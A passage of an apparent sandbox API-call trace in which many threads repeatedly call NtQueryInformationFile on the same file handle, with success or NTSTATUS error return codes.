FileInformationClass=0x9 | out: IoStatusBlock=0x430f908, FileInformation=0x44d8098) returned 0x0 Thread: id = 945 os_tid = 0x158 [0153.055] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x486fcc8, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x486fcc8, FileInformation=0x44d8098) returned 0x0 Thread: id = 946 os_tid = 0xbd8 [0153.057] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x483f800, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x483f800, FileInformation=0x44d8098) returned 0x0 Thread: id = 947 os_tid = 0xbe8 [0153.059] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x430fda0, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x430fda0, FileInformation=0x44d8098) returned 0x0 Thread: id = 948 os_tid = 0xbdc [0153.061] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x489fc00, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x489fc00, FileInformation=0x44d8098) returned 0x0 Thread: id = 949 os_tid = 0x5b4 [0153.063] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x483f790, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x483f790, FileInformation=0x44d8098) returned 0xc0000003 Thread: id = 950 os_tid = 0x614 [0153.065] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x436f960, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x436f960, FileInformation=0x44d8098) returned 0x0 Thread: id = 951 os_tid = 0x690 [0153.067] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x485fa30, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x485fa30, FileInformation=0x44d8098) returned 0xc0000003 Thread: id = 952 os_tid = 0xa68 [0153.068] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x436fc38, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x436fc38, FileInformation=0x44d8098) returned 0xc0000002 Thread: id = 953 os_tid = 0x7d0 [0153.070] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x48cf8f0, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x48cf8f0, FileInformation=0x44d8098) returned 0xc0000010 Thread: id = 954 os_tid = 0x7d8 [0153.072] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x48bfed0, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x48bfed0, FileInformation=0x44d8098) returned 0x0 Thread: id = 955 os_tid = 0x24c [0153.074] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x42efcd0, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x42efcd0, FileInformation=0x44d8098) returned 0x0 Thread: id = 956 os_tid = 0x9f8 [0153.075] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x476fd48, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x476fd48, FileInformation=0x44d8098) returned 0xc0000003 Thread: id = 957 os_tid = 0x798 [0153.077] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x47dfb88, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x47dfb88, FileInformation=0x44d8098) returned 0xc0000010 Thread: id = 958 os_tid = 0xa3c [0153.079] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x48bfa68, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x48bfa68, FileInformation=0x44d8098) returned 0xc0000010 Thread: id = 959 os_tid = 0x8c0 [0153.080] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x482fa50, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x482fa50, FileInformation=0x44d8098) returned 0xc0000010 Thread: id = 960 os_tid = 0x708 [0153.083] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x484fdc8, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x484fdc8, FileInformation=0x44d8098) returned 0xc0000010 Thread: id = 961 os_tid = 0xa64 [0153.084] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x486fc18, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x486fc18, FileInformation=0x44d8098) returned 0xc0000010 Thread: id = 962 os_tid = 0xa30 [0153.086] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x48afc00, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x48afc00, FileInformation=0x44d8098) returned 0xc0000010 Thread: id = 963 os_tid = 0x388 [0153.088] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x480ff40, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x480ff40, FileInformation=0x44d8098) returned 0x0 Thread: id = 964 os_tid = 0x760 [0153.089] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x477fee0, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x477fee0, FileInformation=0x44d8098) returned 0xc0000010 Thread: id = 965 os_tid = 0xa54 [0153.091] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x434fc28, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x434fc28, FileInformation=0x44d8098) returned 0xc0000002 Thread: id = 966 os_tid = 0x738 [0153.093] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x484fba8, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x484fba8, FileInformation=0x44d8098) returned 0xc0000003 Thread: id = 967 os_tid = 0x488 [0153.095] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x47efc18, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x47efc18, FileInformation=0x44d8098) returned 0x0 Thread: id = 968 os_tid = 0x6dc [0153.097] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x47cfab0, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x47cfab0, FileInformation=0x44d8098) returned 0xc0000003 Thread: id = 969 os_tid = 0x7a0 [0153.098] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x490ff20, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x490ff20, FileInformation=0x44d8098) returned 0xc0000010 Thread: id = 970 os_tid = 0x73c [0153.100] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x48bf790, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x48bf790, FileInformation=0x44d8098) returned 0x0 Thread: id = 971 os_tid = 0x1c0 [0153.103] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x477f9b0, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x477f9b0, FileInformation=0x44d8098) returned 0x0 Thread: id = 972 os_tid = 0x7c4 [0153.104] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x484fce8, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x484fce8, FileInformation=0x44d8098) returned 0x0 Thread: id = 973 os_tid = 0x790 [0153.106] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x489fbc0, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x489fbc0, FileInformation=0x44d8098) returned 0xc0000003 Thread: id = 974 os_tid = 0x688 [0153.108] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x430fd90, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x430fd90, FileInformation=0x44d8098) returned 0x0 Thread: id = 975 os_tid = 0x240 [0153.109] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x47efd68, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x47efd68, FileInformation=0x44d8098) returned 0x0 Thread: id = 976 os_tid = 0x8e0 [0153.112] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x486f9e8, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x486f9e8, FileInformation=0x44d8098) returned 0x0 Thread: id = 977 os_tid = 0x880 [0153.113] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x430f7e0, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x430f7e0, FileInformation=0x44d8098) returned 0x0 Thread: id = 978 os_tid = 0x8f0 [0153.115] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x436f810, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x436f810, FileInformation=0x44d8098) returned 0x0 Thread: id = 979 os_tid = 0xa18 [0153.117] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x485fe28, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x485fe28, FileInformation=0x44d8098) returned 0x0 Thread: id = 980 os_tid = 0x8a0 [0153.118] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x487fca0, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x487fca0, FileInformation=0x44d8098) returned 0x0 Thread: id = 981 os_tid = 0x870 [0153.120] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x489ff50, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x489ff50, FileInformation=0x44d8098) returned 0x0 Thread: id = 982 os_tid = 0x9a0 [0153.122] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x432faf8, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x432faf8, FileInformation=0x44d8098) returned 0x0 Thread: id = 983 os_tid = 0x2c4 [0153.123] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x485f9d0, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x485f9d0, FileInformation=0x44d8098) returned 0x0 Thread: id = 984 os_tid = 0x890 [0153.125] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x47cf980, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x47cf980, FileInformation=0x44d8098) returned 0x0 Thread: id = 985 os_tid = 0x4e8 [0153.126] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x477f7b8, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x477f7b8, FileInformation=0x44d8098) returned 0x0 Thread: id = 986 os_tid = 0xcc [0153.128] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x485f7f8, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x485f7f8, FileInformation=0x44d8098) returned 0x0 Thread: id = 987 os_tid = 0xd0 [0153.130] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x479f8c0, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x479f8c0, FileInformation=0x44d8098) returned 0x0 Thread: id = 988 os_tid = 0xd4 [0153.131] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x482fbf8, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x482fbf8, FileInformation=0x44d8098) returned 0x0 Thread: id = 989 os_tid = 0xd8 [0153.133] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x479ff78, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x479ff78, FileInformation=0x44d8098) returned 0x0 Thread: id = 990 os_tid = 0xdc [0153.135] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x487fc58, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x487fc58, FileInformation=0x44d8098) returned 0x0 Thread: id = 991 os_tid = 0xe0 [0153.136] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x481fc50, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x481fc50, FileInformation=0x44d8098) returned 0x0 Thread: id = 992 os_tid = 0xe4 [0153.138] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x482fd40, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x482fd40, FileInformation=0x44d8098) returned 0x0 Thread: id = 993 os_tid = 0xe8 [0153.140] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x42efad8, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x42efad8, FileInformation=0x44d8098) returned 0x0 Thread: id = 994 os_tid = 0xec [0153.141] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x487fe20, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x487fe20, FileInformation=0x44d8098) returned 0x0 Thread: id = 995 os_tid = 0x748 [0153.143] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x42ef870, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x42ef870, FileInformation=0x44d8098) returned 0x0 Thread: id = 996 os_tid = 0xc4 [0153.145] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x42efa38, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x42efa38, FileInformation=0x44d8098) returned 0x0 Thread: id = 997 os_tid = 0x620 [0153.146] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x483ff38, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x483ff38, FileInformation=0x44d8098) returned 0x0 Thread: id = 998 os_tid = 0x910 [0153.148] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x47bfed0, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x47bfed0, FileInformation=0x44d8098) returned 0x0 Thread: id = 999 os_tid = 0x950 [0153.150] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x492fe58, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x492fe58, FileInformation=0x44d8098) returned 0x0 Thread: id = 1000 os_tid = 0x940 [0153.151] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x488f850, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x488f850, FileInformation=0x44d8098) returned 0x0 Thread: id = 1001 os_tid = 0x980 [0153.153] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x487fdd8, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x487fdd8, FileInformation=0x44d8098) returned 0x0 Thread: id = 1002 os_tid = 0xa10 [0153.155] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x47fff78, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x47fff78, FileInformation=0x44d8098) returned 0x0 Thread: id = 1003 os_tid = 0x72c [0153.157] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x42efec0, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x42efec0, FileInformation=0x44d8098) returned 0x0 Thread: id = 1004 os_tid = 0x9e0 [0153.158] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x47cfb50, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x47cfb50, FileInformation=0x44d8098) returned 0x0 Thread: id = 1005 os_tid = 0x9c4 [0153.160] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x476fb00, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x476fb00, FileInformation=0x44d8098) returned 0x0 Thread: id = 1006 os_tid = 0xa6c [0153.161] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x489f808, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x489f808, FileInformation=0x44d8098) returned 0x0 Thread: id = 1007 os_tid = 0xb00 [0153.163] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x481fdf0, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x481fdf0, FileInformation=0x44d8098) returned 0x0 Thread: id = 1008 os_tid = 0xaf8 [0153.165] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x480fa70, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x480fa70, FileInformation=0x44d8098) returned 0x0 Thread: id = 1009 os_tid = 0xae4 [0153.166] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x479ff30, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x479ff30, FileInformation=0x44d8098) returned 0x0 Thread: id = 1010 os_tid = 0x344 [0153.168] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x477fcd8, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x477fcd8, FileInformation=0x44d8098) returned 0x0 Thread: id = 1011 os_tid = 0x808 [0153.170] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x490fe00, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x490fe00, FileInformation=0x44d8098) returned 0x0 Thread: id = 1012 os_tid = 0x858 [0153.172] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x488fd00, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x488fd00, FileInformation=0x44d8098) returned 0x0 Thread: id = 1013 os_tid = 0x224 [0153.173] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x47efb60, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x47efb60, FileInformation=0x44d8098) returned 0x0 Thread: id = 1014 os_tid = 0x4dc [0153.175] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x48afa70, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x48afa70, FileInformation=0x44d8098) returned 0x0 Thread: id = 1015 os_tid = 0x78c [0153.177] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x479ff28, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x479ff28, FileInformation=0x44d8098) returned 0x0 Thread: id = 1016 os_tid = 0xb0 [0153.178] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x432fc80, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x432fc80, FileInformation=0x44d8098) returned 0x0 Thread: id = 1017 os_tid = 0x314 [0153.180] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x48af968, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x48af968, FileInformation=0x44d8098) returned 0x0 Thread: id = 1018 os_tid = 0x804 [0153.182] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x432f920, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x432f920, FileInformation=0x44d8098) returned 0x0 Thread: id = 1019 os_tid = 0x854 [0153.183] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x47bfa20, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x47bfa20, FileInformation=0x44d8098) returned 0x0 Thread: id = 1020 os_tid = 0xa78 [0153.185] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x487fc08, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x487fc08, FileInformation=0x44d8098) returned 0x0 Thread: id = 1021 os_tid = 0x6a8 [0153.186] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x477fe00, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x477fe00, FileInformation=0x44d8098) returned 0x0 Thread: id = 1022 os_tid = 0x7a8 [0153.188] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x430fbb8, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x430fbb8, FileInformation=0x44d8098) returned 0x0 Thread: id = 1023 os_tid = 0x330 [0153.190] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x48afb48, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x48afb48, FileInformation=0x44d8098) returned 0x0 Thread: id = 1024 os_tid = 0x3a4 [0153.191] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x48ef950, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x48ef950, FileInformation=0x44d8098) returned 0x0 Thread: id = 1025 os_tid = 0x67c [0153.193] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x481fd78, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x481fd78, FileInformation=0x44d8098) returned 0x0 Thread: id = 1026 os_tid = 0x5cc [0153.195] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x478fa30, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x478fa30, FileInformation=0x44d8098) returned 0x0 Thread: id = 1027 os_tid = 0x840 [0153.198] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x477fce8, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x477fce8, FileInformation=0x44d8098) returned 0x0 Thread: id = 1028 os_tid = 0x69c [0153.199] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x48cf920, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x48cf920, FileInformation=0x44d8098) returned 0x0 Thread: id = 1029 os_tid = 0x6f0 [0153.201] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x489fc78, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x489fc78, FileInformation=0x44d8098) returned 0x0 Thread: id = 1030 os_tid = 0x810 [0153.203] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x485fed0, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x485fed0, FileInformation=0x44d8098) returned 0x0 Thread: id = 1031 os_tid = 0xa88 [0153.205] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x436f7f0, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x436f7f0, FileInformation=0x44d8098) returned 0x0 Thread: id = 1032 os_tid = 0x43c [0153.207] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x483fe58, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x483fe58, FileInformation=0x44d8098) returned 0x0 Thread: id = 1033 os_tid = 0x670 [0153.208] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x484ff10, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x484ff10, FileInformation=0x44d8098) returned 0x0 Thread: id = 1034 os_tid = 0xa14 [0153.210] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x479fca8, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x479fca8, FileInformation=0x44d8098) returned 0x0 Thread: id = 1035 os_tid = 0x990 [0153.212] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x47bf7b0, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x47bf7b0, FileInformation=0x44d8098) returned 0x0 Thread: id = 1036 os_tid = 0x2dc [0153.214] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x481fa80, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x481fa80, FileInformation=0x44d8098) returned 0x0 Thread: id = 1037 os_tid = 0x74c [0153.215] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x487f7a0, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x487f7a0, FileInformation=0x44d8098) returned 0x0 Thread: id = 1038 os_tid = 0x3c4 [0153.217] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x48cf7c0, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x48cf7c0, FileInformation=0x44d8098) returned 0x0 Thread: id = 1039 os_tid = 0x90 [0153.219] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x488f790, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x488f790, FileInformation=0x44d8098) returned 0x0 Thread: id = 1040 os_tid = 0x630 [0153.221] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x48cfe30, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x48cfe30, FileInformation=0x44d8098) returned 0x0 Thread: id = 1041 os_tid = 0x124 [0153.224] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x48cf7e8, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x48cf7e8, FileInformation=0x44d8098) returned 0x0 Thread: id = 1042 os_tid = 0xc0 [0153.228] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x485fab0, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x485fab0, FileInformation=0x44d8098) returned 0x0 Thread: id = 1043 os_tid = 0x360 [0153.230] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x490fe80, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x490fe80, FileInformation=0x44d8098) returned 0x0 Thread: id = 1044 os_tid = 0x920 [0153.231] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x487f9d8, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x487f9d8, FileInformation=0x44d8098) returned 0x0 Thread: id = 1045 os_tid = 0xbec [0153.233] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x479fe38, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x479fe38, FileInformation=0x44d8098) returned 0x0 Thread: id = 1046 os_tid = 0x6b8 [0153.234] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x47ef870, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x47ef870, FileInformation=0x44d8098) returned 0x0 Thread: id = 1047 os_tid = 0x30c [0153.236] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x479f948, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x479f948, FileInformation=0x44d8098) returned 0x0 Thread: id = 1048 os_tid = 0xbfc [0153.238] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x47dfab0, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x47dfab0, FileInformation=0x44d8098) returned 0x0 Thread: id = 1049 os_tid = 0x3f8 [0153.240] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x486f8b0, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x486f8b0, FileInformation=0x44d8098) returned 0x0 Thread: id = 1050 os_tid = 0x6cc [0153.242] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x48bfe70, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x48bfe70, FileInformation=0x44d8098) returned 0x0 Thread: id = 1051 os_tid = 0x830 [0153.244] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x432fc48, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x432fc48, FileInformation=0x44d8098) returned 0x0 Thread: id = 1052 os_tid = 0x75c [0153.245] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x481f868, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x481f868, FileInformation=0x44d8098) returned 0x0 Thread: id = 1053 os_tid = 0x7f0 